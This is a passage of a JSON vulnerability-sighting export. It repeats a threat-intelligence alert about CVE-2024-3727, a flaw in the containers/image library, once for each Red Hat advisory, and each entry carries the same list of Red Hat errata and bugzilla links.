2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "35a38379-ffc4-4499-b3b4-c533bcc54462", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7182", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "0f44df89-dae1-4317-a84c-84f12bb2950e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6054", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "83ef2fac-5eac-4e8a-afa2-65eacd8ea94b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5258", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "5e02733e-33b2-4713-9c5e-64b7b5a3dbd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7164", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "32957f29-2e71-48d3-8c96-270357e31482", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4850", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "6e0f6774-3691-46f5-9cdb-9bd78d326ba6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6824", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "f85b18af-d644-4dd7-ae70-8c6f7300c320", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9097", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "7b61c5f3-a6e7-4790-90c8-2fbe30dd33d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6708", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "fd04e49c-1348-4efb-9685-08e2aec81a48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5951", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "130846d6-73f4-4041-bb0d-4a92488813de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8425", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "a058309b-069b-4e22-b99c-6b09d0f7ec4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9098", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "ac72ad2e-cecf-4954-ac56-388fa1feffe1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9102", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "053a9fa5-edb0-426a-865a-30dfb62909bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7941", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. 